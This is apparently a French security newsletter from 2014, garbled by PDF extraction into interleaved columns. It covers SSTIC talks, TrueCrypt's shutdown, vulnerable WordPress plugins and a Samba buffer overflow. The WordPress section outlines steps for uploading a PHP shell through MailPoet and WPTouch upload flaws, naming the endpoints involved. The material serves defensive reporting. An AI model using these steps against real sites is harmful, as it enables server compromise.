sentation_intermediaire_de_code_windows/SSTIC2014-Ar- 3me jour, pTra (Python TRace Analyzer), permettant den-
ticle-representation_intermediaire_de_code_windows-le- registrer et de manipuler le contexte dexcution (tat des
comte.pdf registres, instructions excutes, accs mmoires) dun pro-
gramme. Ce type danalyse est tout particulirement utile 47

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
dans lanalyse de DRM.

Loutil va tout dabord sauvegarder lvolution du contexte


dexcution au sein dune base de donnes (MongoDB),
puis va lancer une phase danalyse pour identifier les diff-
rents blocs logiciels et les diffrentes entres et sorties de
ceux-ci, afin de retrouver lalgorithme original.

Obfuscation de code Python : amlioration des tech-


niques existantes
Ninon Eyrolles & Serge Guelton (QUAKSLAB)

+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/ob-
fuscation_de_code_python__amlioration_des_techni/
SSTIC2014-Slides-obfuscation_de_code_python__amliora-
tion_des_techniques_existantes-eyrolles_guelton.pdf
Rfrences

+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/ob-
fuscation_de_code_python__amlioration_des_techni/ +[1] https://www.sstic.org/2014/news/
SSTIC2014-Article-obfuscation_de_code_python__amliora-
tion_des_techniques_existantes-eyrolles_guelton.pdf

Lquipe de QuarksLab nous a prsent son packeur ob-


fusquant pour Python, Python-pack. Aprs nous avoir ex-
pliqu les spcificits de python, ils nous ont montr les
diffrentes techniques utilises. Les transformations sont
effectues trois niveaux (code source, interprteur, ou les
2 en mme temps). Les chercheurs nous ont ainsi prsen-
t plusieurs mthodes utilises, comme la modification de
linterprteur, les modifications des opcodes, la modifica-
tion du bytecode la vole, lobfuscation des donnes et la
compilation statique.

Exemple de renforcement de la scurit dun OIV


Victor Vuillard (Orange)

+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secu-
rite_des_ordivisions/SSTIC2014-Slides-securite_des_ordivi-
sions-basse.pdf

+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/scu-
rit_de_la_gestion_dynamiqu_cloud/SSTIC2014-Article-scu-
rit_de_la_gestion_dynamiqu_cloud-zheng_ben-othman_
lazri_laniepce.pdf

Prsentation dune nouvelle vulnrabilit introduite par le


Cloud et permettant de dgrader facilement les perfor-
mances des machines. En effet, afin de prserver les per-
formances dun hyperviseur (ou de faire du surbooking ?),
celui-ci dplace les VM lorsquelles demandent plus de res-
sources. Ainsi, il est possible, en jouant avec les ressources,
de dgrader les performances des VM htes.

48
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
LActualit du moment

Que sest-il pass au cours de ces dernires


semaines au sein du petit monde de la
scurit informatique ?

Retour sur une analyse de plusieurs failles


affectant les plugins WordPress, la faille
Samba (CVE-2014-3560) et la mort de
TrueCrypt
alifaan

Tendance

ACTUA TrueCrypt est mort


par Regis SENET

LIT Attaques

DU
Les plugins WordPress vulnrables
Par Arnaud REYGNAUD

MOMENT Vulnrabilits
Samba CVE-2014-3560
Par Etienne BAUDIN

49

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
TrueCrypt : Retour sur une
mort prmature
par Rgis SENET

Joe Pemberton
TrueCrypt ne crypt plus depuis la fin du mois de Mai Paralllement, ou conjointement, lutilisation dun mot
2014. Nous vous proposons une rapide analyse post-mor- de passe, il est possible dutiliser un fichier jouant le rle de
tem dun des plus clbres logiciels grand public de chif- clef secrte pour le chiffrement des donnes. Ces fichiers
frement des donnes. ne subiront aucune modification par TrueCrypt. Bien sr,
ces fichiers sont sensibles aux changements : si les 1024
premiers kilos bytes sont modifis, il ne sera alors plus pos-
sible de dchiffrer vos donnes. Il est donc impratif duti-
> Quest ce que TrueCrypt ? liser des fichiers nayant pas pour vocation tre modifis
(Images, PDF, etc.).
Avant de nous lancer dans de vastes explications, voici un
bref rappel sur ce quest (qutait?) TrueCrypt. Il sagit dun
logiciel gratuit, multi plateforme (Windows, Mac et Linux)
permettant de faire du chiffrement de donnes la vole. Avant sa rapide et brutale disparition,
TrueCrypt tait considr comme robuste. De
Il permet de crer un disque virtuel chiffr contenu lin- nombreux audits furent effectus ...
trieur dun fichier et de le monter comme un disque phy- aucun rel problme de scurit na pu tre
sique. Il est galement possible de chiffrer entirement
identifi
une partition ou un priphrique externe. Le chiffrement
est automatique, en temps rel et transparent pour luti-
TrueCrypt est galement connu pour ses possibilits de dni
lisateur. Toute donne stocke dans un volume TrueCrypt
plausible. Le dni plausible consiste en lincapacit de prou-
sera entirement chiffre, incluant les noms des fichiers et
ver quun conteneur cach et chiffr existe au sein dun
les rpertoires.
conteneur chiffr. Ce second volume chiffr est accessible
laide de son propre mot de passe (et non accessible
Trois algorithmes de chiffrement sont disponibles afin
laide du mot de passe du volume principal). Son existence
dassurer la scurit des donnes : AES, Serpent et Two-
ne peut alors tre prouve, ou plutt, ne peut tre nie.
fish. De nombreuses combinaisons sont galement dis-
ponibles (AES-Twofish, AES-Twofish-Serpent, Serpent-AES,
Avant sa rapide et brutale disparition, TrueCrypt tait consi-
Serpent-Twofish_AES et Twofish-Serpent). Celles-ci per-
dr comme robuste. De nombreux audits furent effectus
mettent de prvenir une potentielle faiblesse dans lun des
afin dprouver sa scurit et ils furent tous unanimes : au-
algorithmes, aux dpens de la vitesse de lecture et dcri-
cun rel problme de scurit na pu tre identifi (Voir 1,
ture. En effet, chaque bloc de donnes est chiffr indivi-
2 et 3).
50 duellement.

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> 28 mai 2014, nous avons perdu
TrueCrypt + Sourceforge dclare quaucun de leur voyant permettant
de dtecter une intrusion ne sest affol. (6)

Le 28 mai 2014, une tempte a souffl dans la sphre in-


formatique. Les dveloppeurs de TrueCrypt abandonnent le
+ La nouvelle version de TrueCrypt a t signe avec les
mmes cls que les autres versions.
projet ! En effet, le site TrueCrypt.org a t modifi afin
de rediriger vers une page rudimentaire hberge sur true-
crypt.sourceforge.net.
+ Plusieurs semaines plus tard, les dveloppeurs auraient
pu se manifester pour annoncer limposture, mais ne lont
pas fait.
Ce nouveau site avertit les internautes de lexistence po-
tentielle de failles de scurit (WARNING: Using TrueCrypt
is not secure as it may contain unfixed security issues). Ces Le projet TrueCrypt comporte rellement de grosses
failles seraient lies la fin du support de Windows XP par vulnrabilits
Microsoft survenue trois semaines auparavant. Le site pro-
pose en tant qualternative un tutoriel sur le logiciel de chif- De nombreux audits sont actuellement en cours sur le logi-
frement propritaire de Windows : BitLocker. ciel de chiffrement. Lun dentre eux tait il sur le point de
trouver une importante vulnrabilit affectant lensemble
des versions ?

Les dveloppeurs nont dailleurs pas rpondu favorable-


ment la demande des internautes dsireux de disposer du
code afin de pouvoir forker TrueCrypt. Officiellement, il
serait prfrable de repartir de zro plutt que de reprendre
le logiciel.

Oui mais

+ Lapparition de failles critiques est quotidienne. Certains


logiciels rgulirement impacts (Microsoft, Oracle, Adobe,
Plusieurs points rendent la microsphre des spcialistes en etc.) devraient-ils faire comme TrueCrypt ? Ceci est un autre
scurit informatique perplexes face cette annonce : dbat !

+ La nouvelle page, plus que rudimentaire, pousse les


utilisateurs dun projet Open Source se rapprocher dun
+ La prsence dune faille, mme critique, ne signifie pas
obligatoirement larrt du dveloppement dun projet. True-
logiciel propritaire Microsoft, connu pour sa proximit avec Crypt aurait pu sen sortir mais a prfr saborder son projet
les services de renseignements amricains. ainsi que lensemble des versions prcdentes sans donner
la possibilit la communaut de lui venir en aide.
+ La totalit des versions de TrueCrypt a t supprime
du site. Seule la version 7.2 (mise en ligne le jour mme)
subsiste. Cette dernire passant dune taille de 3.3Mo Les services de renseignements sen sont mls !
2.5Mo (4).
Larrt aussi brutal dun logiciel vieux de dix ans reste un
+ Enfin, les dveloppeurs ont dclar que leur logiciel
ntait plus fiable et lont abandonn, du jour au lende-
mystre pour de nombreuses personnes et la thorie du
complot refait son apparition.
main, aprs dix annes de dveloppement et de mainte-
nance. TrueCrypt commenait revenir rgulirement dans des af-
faires ou les forces de lordre et les services secrets amri-
cains taient mls (Edward Snowden, Daniel Dantas, etc.).
Tout le monde sest accord sur le fait que cette disparition Agac par ces checs rptitions, il est probable que les
est trange, rapide et que quelque chose de louche trane services de renseignement amricains (ou autre, ne soyons
l-dessous. Oui, mais quoi? De nombreuses hypothses pas sectaires) aient russi dcouvrir lidentit des dve-
existent : loppeurs, qui taient jusquici rests anonymes.

Toujours selon cette thorie conspirationniste, la nouvelle


Le projet TrueCrypt a t pirat page du site fait penser un Warrant Canary . Ce proc-
d permet aux diteurs d annoncer quils se sont fait
Une page faite la va-vite, une annonce (passer sur BitLoc- approcher par les services de renseignement sans avoir le
ker) tellement improbable quelle en est risible, une nou- droit lgalement de lavouer publiquement (article 18 U.S.C
velle version dchiffrant mais ne chiffrant plus TrueCrypt 2709 du Patriot Act).
a t pirat!!
Cette affaire ressemble trangement laffaire Lavabit, ga-
Oui mais lement utilis par Edward Snowden, dont le projet avait t
51

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
La mort de TrueCrypt

sabord dune manire similaire. voque clairement la possibilit dun fork, qui reprendrait
le code source de TrueCrypt toujours disponible sur Github.
Rajoutons cela certains faits marquants :
Le dveloppement de ce fork, bas en Suisse pour viter
+ Demande aux utilisateurs de migrer vers une technolo-
gie NSA compliant
toute influence amricaine, serait moins opaque que celui
de lquipe originale.

+ Sur la page du site, on peut lire WARNING: Using True-


Crypt is Not Secure As Si lon souhaite avoir plus de dtails,
Nanmoins, avant de commencer travailler sur ce fork,
lquipe prfre attendre les rsultats de laudit de scurit
il est possible de lire la totalit de la phrase : Using TrueCrypt initi par lOpenCryptoAudit. Une premire partie des r-
is not secure as it may contain unfixed security issues sultats a dj t publie et na pas permis didentifier de
faille critique dans le code source de lancienne version de
Si lon extrait les premires lettres (uti nsa im cu si) nous ob- TrueCrypt. Une version finale de laudit devrait tre dispo-
tenons Si je veux utiliser la NSA en latin ou encore, si lon nible dans les prochains mois.
reprend le W du dbut (Wuti nsa im cu si) nous obtenons
(jespre que vous le savez), la NSA voit tout le monde
en albanais. CQFD !
> Conclusions
Toutes les cartes ne sont pas encore joues concernant
Alors que les jours passants TrueCrypt.
dcrdibilisent de plus en plus lhypothse de
la compromission du compte, Alors que les jours passants dcrdibilisent de plus en plus
nous sommes toujours dans lattente de lau- lhypothse de la compromission du compte, nous sommes
toujours dans lattente de laudit en cours qui pourra peut-
dit en cours qui pourra peut-tre rpondre
tre rpondre certaines de nos questions.
certaines de nos questions.
Au cas o cet audit ne permettrait pas didentifier de faille
de scurit critique, nos regards recommenceraient se
Marre de mettre toujours en doute lhonntet de la NSA tourner vers les services de renseignements. Nous com-
? Cela se comprend. Aprs tout, ce nest peut-tre pas eux. menons bien les connatre avec les nombreuses informa-
Noublions pas que la version 7.2 de TrueCrypt est la der- tions divulgues par les documents drobs par Snowden.
nire version en date et que 7 et 2 correspondent respecti-
vement G et B. Il ny a plus aucun doute, les services de
renseignements anglais sont galement dans le coup !
Rfrences

> Des alternatives TrueCrypt ?


Depuis larrt brutal de TrueCrypt, les alternatives fleurissent
+ [1] http://www.ssi.gouv.fr/IMG/cspn/dcssi-cspn_2008-
03fr.pdf

+[2] http://news.techworld.com/security/3228701/fbi-
un peu partout dans le monde :

+des forks (Ciphersed.org, TrueCrypt.ch, VeraCrypt,) ; hackers-fail-to-crack-truecrypt/

+des logiciels compatibles (TcPlay, Luksus, etc.) ; + [3] https://madiba.encs.concordia.ca/~x_decarn/true-


crypt-binaries-analysis/
+ou encore des logiciels embarqus aux systmes dex-
ploitation (Windows avec BitLocker, Mac avec FileVault ou +[4] https://github.com/warewolf/truecrypt/com-
encore Linux avec LUKS). pare/master...7.2#diff-9fc90217decda8d7d16d55ffaf-
7401c0R2295

+[5] http://beta.slashdot.org/story/203553
Le site Truecrypt.ch se prsente ainsi comme une plate-
forme ayant pour ambition de rcolter le maximum din-

+[6] https://news.ycombinator.com/item?id=7813121
formations sur larrt de TrueCrypt. Le site met disposition
52 les dernires versions valables de TrueCrypt. De plus, le site
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
WordPress et les plugins
vulnrables
par Arnaud REYGNAUD

Stefanos Kofopoulos
> Introduction
+ Custom Contact Forms 5.1.0.2 ;
+ MailPoet Newsletters 2.6.6 ;
WordPress est un systme de gestion de contenu (CMS
/ Content Management System) gratuit et libre, qui per-

+WP Touch 3.4.3 ;


met de crer et de grer lensemble dun site web ou plus
simplement dadministrer un blog. Une importante com-
munaut soutient aujourdhui le projet et le fait voluer
travers le monde entier. Le CMS se veut entirement per- http://blog.secupress.fr/attaques-wordpress-261.html
sonnalisable, ce qui se traduit par un choix important de https://cert.xmco.fr/veille/index.xmco?nv=CXA-2014-2577
thmes et de plugins proposs par les dveloppeurs du
projet, mais galement par des tiers.

Bien que la scurit soit un axe important dans le dvelop-


pement de WordPress, les multiples plugins et thmes ins-
talls par les utilisateurs comportent bien souvent des vul-
nrabilits qui peuvent impacter de diffrentes manires
le systme hte ; allant du classique dni de service la
compromission du serveur.

Rcemment, plusieurs alertes critiques ont concerns 5


plugins qui amassent au total plus de 20 millions de tl-
chargements. Ce chiffre important laisse donc supposer que
des milliers, voire des millions de sites bass sur WordPress,
sont potentiellement vulnrables.
Nikolay Bachiyski

Dans cet article, nous tcherons de prsente les vulnrabili-


ts en question, publies cet t et qui affectent les plugins
suivants :

+ All In One SEO Pack 2.1.5.1 ; 53

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
WordPress et ses plugins

mandes SQL initialement prvues des fins de backup.


> Custom Contact Forms
Description

Le plugin Custom Contact Forms est utilis afin de crer des


formulaires de contacts personnaliss.

https://wordpress.org/plugins/custom-contact-forms/ Toutes ces fonctions utilisent donc des droits dadministra-


tion. Il est ainsi possible dutiliser la fonction runImport() afin
dexcuter des commandes SQL spcialement conues dans
Dtails techniques la base de donnes (crer un administrateur par exemple)
avec des droits levs. Il en rsulte ainsi la compromission
La vulnrabilit tudie permet un attaquant distant non du site, le dfacement, ou encore le vol dinformations.
authentifi daltrer la base de donnes et de compro-
mettre lintgralit du site Web concern, voire daccder http://blog.sucuri.net/2014/08/database-takeover-in-cus-
au serveur. Cette faille peut tre exploite en abusant des tom-contact-forms.html
fonctions dimport et dexport propres au plugin.

Pour ce faire, un attaquant peut profiter de la fonction


is_admin() dfinie au sein du coeur de WordPress. Cette
> All in One SEO Pack
dernire permet de vrifier le niveau de permission dun Description
utilisateur afin dautoriser ou non la poursuite dune action.
Comme spcifi dans la documentation, cette fonction ne Ce plugin est utilis afin doptimiser les informations utili-
doit pas tre utilise dans le cadre de vrification de scu- ses par les moteurs de recherche pour le rfrencement
rit. des publications du site web hte. Il totalise plus de 20 mil-
lions de tlchargements.

La vulnrabilit tudie permet un attaquant authentifi


avec un niveau de privilges restreints (exemple un rle
Auteur, Contributeur, etc.) de modifier les informations lies
au plugin (SEO Title, SEO Description, SEO Keywords). Cela
peut impacter de manire significative limage du site ainsi
que son rfrencement par les moteurs de recherche.

En combinant cette faille avec une autre de type Cross-


Site Scripting (XSS), il est possible dinjecter du code dans
le panneau dadministration et de compromettre les utilisa-
teurs / administrateurs du site cibl.
Dans le cas prsent, la fonction adminInit() est utilise au
sein du fichier custom-contact-forms.php du plugin. En tu- Diffrentes consquences peuvent dcouler de cette at-
diant les sources il est possible de constater que cette fonc- taque :
tion est dpendante de la fonction is_admin().

Les mthodes suivantes : +Atteinte lintgrit des comptes utilisateurs ;


+ La fonction downloadExportFile() permet dexporter +Dfacement du site ;
une partie de la base de donnes SQL (en fonction des pa-
ramtres dfinis dans le plugin) et de la rcuprer dans un +Etc.
dossier export/ ; http://blog.sucuri.net/2014/05/vulnerability-found-in-the-

+
all-in-one-seo-pack-wordpress-plugin.html
La seconde fonction downloadCSVExportFile() reprend
les mmes actions que prcdemment dans un fichier CSV
(Comma-separated values) ;
54 + Enfin, la dernire runImport() sert importer des com-

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> MailPoet Newsletters / Wysija Sans omettre le zip !

Description Il suffit ensuite daccder au fichier sur :


/wp-content/uploads/wysija/themes/ThemeShell.php
Le plugin permet de concevoir des newsletters et de grer
ses listes dabonns dans WordPress. Il est important de prciser quil sagit initialement dune
fonctionnalit de WordPress et non dune vulnrabilit ou
dune erreur de dveloppement. Il est cependant possible
de lutiliser afin de contourner certains mcanismes de s-
curit notamment dans le cas dune utilisation incorrecte
des fonctions prcdemment voques.

Les bonnes pratiques de dveloppement scuris dcon-


seillent fortement lutilisation de la fonction admin_init()
ou encore du is_admin() comme nous venons de le voir
avec ces deux plugins.
La vulnrabilit rfrence CVE-2014-4725 permet un
attaquant distant de contourner certaines restrictions de
scurit (lies la phase dauthentification) et dexcuter
du code PHP arbitraire sur le serveur. Cette exploitation est
possible en uploadant un fichier spcialement conu. Il est
alors possible de prendre le contrle du serveur.

Dtails techniques

MailPoet offre des possibilits de customisation de lappa-


rence des newsletter lies au plugin.

Comme la vulnrabilit affectant Custom Contact Form,


la faille concerne labus de la fonction admin_init() fournie
par WordPress.

Un attaquant est en mesure duploader sur le serveur un


faux thme intgrant un fichier lui permettant dinteragir
avec le serveur (shell PHP). Lopration se veut relative-
ment simple :

+Etape 1
Lattaquant va crer une archive reprenant la structure dun
thme accept par le plugin (il faut obligatoirement un
style.css) et y ajouter son shell .PHP (exemple ThemeShell.
php).

+Etape 2
Lastuce se situe dans labus de /wp-admin/admin-post.
php, plus prcisment du hook admin_init().

Lattaquant va ainsi envoyer une requte HTTP POST sp-


cialement conue vers /wp-admin/admin-post.php?-
page=wysija_campaigns&action=themes afin de contour-
ner les mcanismes de vrification et denvoyer son archive
sur le serveur.

Le payload devra comporter :

55

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
WordPress et ses plugins

> WPTouch aux utilisateurs par lapplication. Lattaque est donc un


audacieux mlange entre la crdulit de lutilisateur, lat-
Description tention que lattaquant aura port son approche, et bien
videmment sa connaissance quant aux actions mener.
Le plugin permet de crer une version mobile dun site afin
de ladapter aux visiteurs disposant de matriels nomades. Les consquences peuvent se rvler dsastreuses pour
A lheure actuelle, plus de 6 millions de tlchargements une entreprise. Une attaque bien construite peut ainsi
ont dj t recenss. conduire des changements de mots de passe, laltration
des contenus dun site Web, des achats en ligne non souhai-
Les versions concernes par la vulnrabilit prsente ne ts, lenvoi demails, etc.
sont lies qu la branche 3.x du plugin et antrieures la
3.4.3. Bien que lintention de se protger des CSRF soit louable,
lintgration de mesures de protection incompltes apporte
Le principe est calqu sur lexploitation de la vulnrabilit son tour de nouvelles vulnrabilits.
impactant MailPoet. Le plugin utilise ici un wp-nonce (token
CSRF) utilis la fois dans la partie backend ainsi que pour Dans le cas prsent, lattaquant a seulement besoin dun
le systme dupload en AJAX. En rcuprant ce token et compte sur le site sans privilges particuliers. Un token uti-
en le renvoyant dans une requte spcialement conue, un lis la fois comme mesure anti-CSRF sur la partie backend
utilisateur malveillant est en mesure duploader un fichier et en tant que mcanisme de vrification pour la fonction
arbitraire afin dinteragir avec le serveur. dupload du plugin va ensuite tre utilis. Le plugin utilisant
un mcanisme dupload local la place des solutions four-
nies par WordPress via son API, il est possible de contourner
les mcanismes de scurit classiques.

Voici les tapes de lexploit en quelques lignes :

+Etape 1 :
- Sidentifier sur le site cibl avec des droits non administra-
teur (auteur par exemple)

- Rcuprer la valeur du token admin_nonce li lURL /


wp-admin (dans le cookie cr par WordPress).

Afin de mieux comprendre le fonctionnement de cette +Etape 2 :


vulnrabilit , il est important de rappeler ce quest une
Cross Site Request Forgery (CSRF). Il sagit dun type - Envoyer une requte POST vers wp-admin/admin-ajax.
dattaques inhrent aux applications Web. Bien que trs r- php ayant pour payload :
pandues, elles sont trop souvent dnigres ou considres
comme inefficaces, tort !

Le principe est simple, un attaquant va altrer un lien dans


le but de provoquer lexcution dune action non souhaite
par lutilisateur. Pour ce faire, il lui suffira de se baser sur
une requte prdictible avant de lenvoyer un utilisateur - Sans omettre le fichier faisant office de shell.
par le biais de diffrentes techniques (simple URL, image,
etc.). admin-ajax.php va traiter la requte et interagir avec le
mcanisme dupload du plugin WPTouch (cf. paramtre en
Il est important de les distinguer des XSS qui consistent POST). Lattaquant aura ainsi son shell disposition sur le
injecter du code dans un document HTML afin dabuser le serveur.
navigateur client. Le but dune CSRF est en revanche dex-
cuter une action non dsire par le client sur un site o la
victime possde un accs privilgi.
56 La CSRF se base en grande partie sur la confiance attribue

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Conclusion
> INFO
Bien videmment, cette liste nest pas exhaustive et les
entits cites ne doivent pas tre tenues pour responsables XMCO partenaire mdia de NoSuchCon #2
de toutes les attaques lies WordPress. Dautres plugins
La confrence internationale NoSuchCon aura lieu les 19, 20 et
sont rgulirement touchs linstar de TimThumb, vBul-
21 novembre lespace Niemeyer.
letin, etc., sans omettre les nombreux thmes compromis
ou encore les composants maison dvelopps par les Les membres reconnus de la communaut internationale qui
utilisateurs du CMS. constituent le comit nous ont encore une fois concoct un pro-
gramme des plus allchant avec la prsence dexperts interna-
A lheure actuelle, toutes les vulnrabilits cites ont t tionaux, venus exposer leurs travaux de recherches au travers de
corriges par les diteurs. prsentations souvent techniques.

Quoi quil en soit, quelques conseils simples permettent de Parmis les talks dores et dj annoncs, on peut dj relever :
- Rolf Rolles nous gratifiera dune Keynote intitule Program
rduire les risques encourus :
Synthesis in Reverse Engineering ;

+
- Alex Ionescu, qui fait durer le suspens avec son talk surprise
Nutiliser que les plugins ncessaires , inutile de ra- dont il na pas encore rvl le contenu ;
jouter des vulnrabilits supplmentaires en largissant la - Andrea Barisani prsentera quant lui les avances de son pro-
surface dattaque ; jet USB Armory, et qui devrait mme apporter avec lui quelques
prototypes ;
+ Apporter la plus grande vigilance quant aux plugins et
thmes gratuits. ;
- Nicolas Collignon gratignera les mcanismes de scurit de
la Google App Engine, garanti sans troll et avec des exemples
dattaque concrets ;

+Maintenir le CMS, tout comme lensemble de ses com-


posants, jour ;
- Benjamin Delpy nous instruira sur les nouvelles fonctionnalits
de scurit apportes par Windows 10 et sur les volutions de
son outil dexploitation Mimikatz ;

+Sans omettre le simple fait de se tenir inform de ma-


- Renaud Lichfitz fera une dmonstration de calcul sur ordinateur
quantique et abordera les impacts de cette technologie sur les
nire rgulire sur les vulnrabilits affectant ces compo- mcanismes de cryptographiques actuels ;
sants.
Pour le dtail complet du programme et les informations pra-
tiques, nous vous invitons consulter la page ddie du site de
la NoSuchCon : http://www.nosuchcon.org/#schedule
Rfrences
Prenez donc vos places tant quil en reste, et si vous navez pas
la chance de vous y rendre, XMCO sera partenaire mdia et pro-

+
posera un rsum des confrences au sein du numro #39 de
https://wordpress.org/plugins/ notamment les pages lActuScu.
lies aux /developers/ ainsi que les /changelog/

+https://wordpress.org/plugins/all-in-one-seo-pack/
+http://blog.sucuri.net
+http://cve.mitre.org/cgi-bin/cvename.cgi?-
name=CVE-2014-4725

+http://codex.wordpress.org/Plugin_API/Action_Refe-
rence/admin_init

+http://codex.wordpress.org/Function_Reference/is_ad-
min

+https://dev.metasploit.com/api/Msf/HTTP/Wordpress/
URIs.html

+http://packetstormsecurity.com/files/127475/
Wordpress-WPTouch-Authenticated-File-Upload.html

57

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Samba 4 : faille CVE-2014-3560

par Etienne BAUDIN


Kevin Baird

Lorigine de la faille Cette fonction permet de faire une copie dun lment de
type unstring dune source s vers une destination d. Pour
Au dbut de lt, une vulnrabilit critique a t dcou- cela, la fonction strlcpy, qui permet de raliser une copie de
verte au sein de la version 4 du clbre serveur CIFS : Sam- chaine de manire scurise est utilise. Le prototype
ba. Cette faille permet de prendre le contrle dun systme de cette fonction est le suivant :
vulnrable distance.
size_t strlcpy(char * restrict dst, const char * restrict
La vulnrabilit provient de la dfinition de la fonction src, size_t size);
unstrcpy utilise au sein du composant nmbd pour
rsoudre les noms NetBIOS. La vulnrabilit provient du fait quaucune vrification nest
effectue sur la taille des donnes copier depuis la source
Avant toute chose, il est ncessaire dobserver la dclara- vers le tampon de destination. Il est donc possible de pro-
tion des types fstring et unstring. voquer un dbordement de tampon.

#define FSTRING_LEN 256 En effet, sizeof(fstring), qui permet de connatre la taille


typedef char fstring[FSTRING_LEN]; dun lment de type fstring, retourne 256. Or dans les cas
dutilisation de la fonction unstrcpy, llment de destina-
#define MAX_NETBIOSNAME_LEN 16 tion est de type unstring, qui est dfini pour avoir une taille
typedef char unstring[MAX_NETBIOSNAME_LEN*4]; de 64 octects. En utilisant cette fonction, il est ainsi possible
de forcer le systme stocker 256 octets dans un tampon
Observons maintenant la dfinition de la fonction vuln- de 64.
rable :
Le code suivant est un bon exemple de lutilisation de cette
#define unstrcpy(d,s) \ fonction :
do { \ static void name_to_unstring(unstring unname, const char
const char *_unstrcpy_src = (const char *)(s); \ *name)
strlcpy((d),_unstrcpy_src ? _unstrcpy_src : {
,sizeof(fstring)); \ nstring nname;
} while (0)
58 errno = 0;
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
push_ascii_nstring(nname, name); Encore plus fort : comment mettre 256 octets dans 16
if (errno == E2BIG) { octets ?
unstring tname;
pull_ascii_nstring(tname, sizeof(tname), En analysant le code vulnrable, nous avons pu observer
nname); que la fonction nstrcpy tait galement vulnrable. Elle est
strlcpy(unname, tname, sizeof(nname)); dfinie de la faon suivante :
DEBUG(0,( name_to_nstring: workgroup
name %s is too long. Truncating to %s\n , #define nstrcpy(d,s) \
name, tname)); do { \
} else { const char *_nstrcpy_src = (const char *)(s); \
unstrcpy(unname, name); strlcpy((d),_nstrcpy_src ? _nstrcpy_src :
} ,sizeof(fstring)); \
} } while (0)

Comme on peut ainsi le voir dans cet exemple, la va- Celle-ci permet donc la copie dlment de type nstring. Or,
riable unname est au format unstring. Il est donc possible le type nstring est dfini comme ci-dessous:
de mettre 256 octets dans un tampon de seulement 64
octects. Le dbordement, et donc la corruption de la m- #define MAX_NETBIOSNAME_LEN 16
moire, sont invitables. typedef char nstring[MAX_NETBIOSNAME_LEN];

Il est donc possible de raliser la copie dun lment de 256


La vulnrabilit provient de la dfinition de octets dans un lment de seulement 16 octets.
la fonction unstrcpy utilise au sein du
Bien que cette fonction vulnrable soit dfinie, elle nest,
composant nmbd pour rsoudre les noms dans les faits, jamais utilise dans le code de samba. Son
NetBIOS. exploitation est donc nettement plus complique

Nous avons dcouvert la vulnrabilit par une simple ana-


Il est possible dexploiter cette vulnrabilit en envoyant lyse du code source. Nanmoins, elle avait dj t rep-
des paquets rseau CIFS spcialement conus. re et corrige par les dveloppeurs au sein de la version
4.1.12.
A ce jour, aucun exploit na t publi. Par ailleurs, cette
vulnrabilit a t corrige dans la version 4.1.11.

Rfrences
> INFO
Des chercheurs publient le code de lattaque BadUSB + Code vulnrable
https://git .samba.org/?p=samba.git;a=blob;f=lib/
Deux mois aprs la dmonstration de lattaque connue sous le util/string_wrappers.h;h=5f9d5684e62e-
nom BadUSB par SR Labs dans le cadre de la BlackHat (voir 54b526922e83299a8c41c3bfa692

+
CXA-2014-2553), deux chercheurs amricains, Adam Caudill et
Brandon Wilson ont russi reproduire lattaque dans le cadre Vulnrabilit dcouverte par analyse de code
dune autre confrence ddie la scurit : la Derbycon. https://bugzilla.samba.org/show_bug.cgi?id=10758

Les chercheurs se sont dfendus de cette publication potentiel-


lement dangereuse en estimant que des agences disposant de +CVE-2014-3560
http://www.samba.org/samba/security/CVE-2014-3560
moyens consquents comme la NSA pourraient dj utiliser se-
crtement cette attaque.

Les chercheurs de SR Labs lorigine de cette dcouverte avaient


refus de divulguer leur preuve de concept lors de la BlackHat.
Contrairement eux, Caudill et Wilson ont publi leur travail.
Ils esprent ainsi favoriser une prise de conscience des acteurs
du secteur. Ils esprent galement que de futures corrections
soient apportes sur les implmentations des firmwares USB.
En lchant un tel code dans la nature, ils veulent prouver que
nimporte qui peut sen servir et ainsi mettre la pression sur les
fabricants.

Le code de lattaque est disponible sur GitHub ladresse sui-


vante :
https://github.com/adamcaudill/Psychson

59

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le whitepaper du mois
par Charles DAGOUAT

errol_51
Testing Guide 4.0 de lOWASP La prochaine tape va sorienter vers la traduction du guide
dans dautres langues afin de renforcer son accessibilit au
Aprs 18 mois de travail, lorganisation Open Web Applica- grand public.
tion Security Project (OWASP) vient de publier son guide de
tests Web dans sa version 4.0. Le document au format PDF est disponible cette adresse :
https://www.owasp.org/images/1/19/OTGv4.pdf
Lobjectif est de renforcer les bonnes pratiques en matire
de scurisation des applications Web travers :

+la prsentation de vulnrabilits rcurrentes ;


+des explications ciblant les nouvelles technologies ;
+ un ensemble de conseils et doutils destins aider les
dveloppeurs, les utilisateurs ainsi que les professionnels
de la scurit ;

+des initiations la cryptographie ;


+etc.
Plus de 60 personnes de par le monde ont particip lla-
boration de cette mise jour, au terme de laquelle ont t
publies les 220 pages du guide.

Selon Andrew Muller, un membre de lquipe dirigeant le


projet, ce document se rvle avant tout tre un outil p-
dagogique destin duquer les gens ; quel que soit leur
niveau ou leur exprience.
60
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le meilleur du web

Aprs plusieurs annes de bons et loyaux > Slection darticles divers


services, la rubrique Outils est dsormais
remplace par la Revue du Web . Cette
partie permettra de faire un tour dhorizon > Slection darticles techniques
des articles scurit les plus intressants !

> Twitter
Stphane AVI

Slection de comptes Twitter

61 61
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le meilleur du web

> Slection darticles RSSI

Dtails de lattaque GAMMA http://pastebin.com/raw.php?i=cRYvK4jb

